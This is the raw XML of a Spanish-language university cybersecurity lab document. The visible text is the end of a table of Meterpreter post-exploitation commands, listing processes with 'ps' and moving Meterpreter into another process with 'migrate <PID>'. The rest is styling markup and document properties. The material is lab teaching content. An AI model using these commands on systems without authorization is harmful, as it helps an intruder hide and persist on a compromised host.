            <w:shd w:fill="F8F8F8" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
              <w:ind w:left="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Listar procesos</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2600"/>
            <w:shd w:fill="F8F8F8" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
              <w:ind w:left="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="6272A4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">ps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3272"/>
            <w:shd w:fill="F8F8F8" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
              <w:ind w:left="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Lista procesos en ejecución</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3200"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
              <w:ind w:left="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Migrar proceso</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2600"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
              <w:ind w:left="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="6272A4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">migrate &lt;PID&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3272"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
              <w:ind w:left="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Mueve Meterpreter a otro proceso</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="CCCCCC" w:sz="4" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="80" w:before="400"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Laboratorio de Ciberseguridad · 8vo Semestre · Agosto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pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:color w:val="6272A4"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="Heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:pPr>
      <w:spacing w:after="80" w:before="200"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:color w:val="44475A"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="Heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:pPr>
      <w:spacing w:after="60" w:before="160"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:i w:val="false"/>
      <w:iCs w:val="false"/>
      <w:color w:val="50FA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2026-08-10T20:02:27.428Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-08-10T20:02:27.429Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>